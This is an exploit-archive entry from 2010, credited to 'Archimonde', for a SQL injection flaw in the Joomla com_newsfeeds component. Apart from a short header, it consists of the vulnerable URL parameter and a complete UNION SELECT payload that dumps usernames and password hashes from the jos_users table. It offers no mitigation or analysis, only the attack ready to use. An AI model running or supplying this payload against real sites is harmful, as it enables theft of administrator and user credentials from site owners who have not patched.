Joomla Component com_newsfeeds SQL injection vulnerability

2010-04-30T00:00:00
ID 1337DAY-ID-12081
Type zdt
Reporter Archimonde
Modified 2010-04-30T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ==========================================================
Joomla Component com_newsfeeds SQL injection vulnerability
==========================================================

# Exploit Title: Joomla Component com_newsfeeds SQL injection vulnerability
# Date: 30/04/2010
# Author: Archimonde
# Software Link:
# Version:
# Tested on:
# CVE :
# Code :
 
Email : [email protected]
Website : xgroupvn.org - programmer.vn
 
index.php?option=com_newsfeeds&view=categories&feedid=[sqli]
 
Example:
 
http://[site]/index.php?option=com_newsfeeds&view=categories&feedid=-1%20union%20select%201,concat%28username,char%2858%29,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30%20from%20jos_users--



#  0day.today [2018-04-13]  #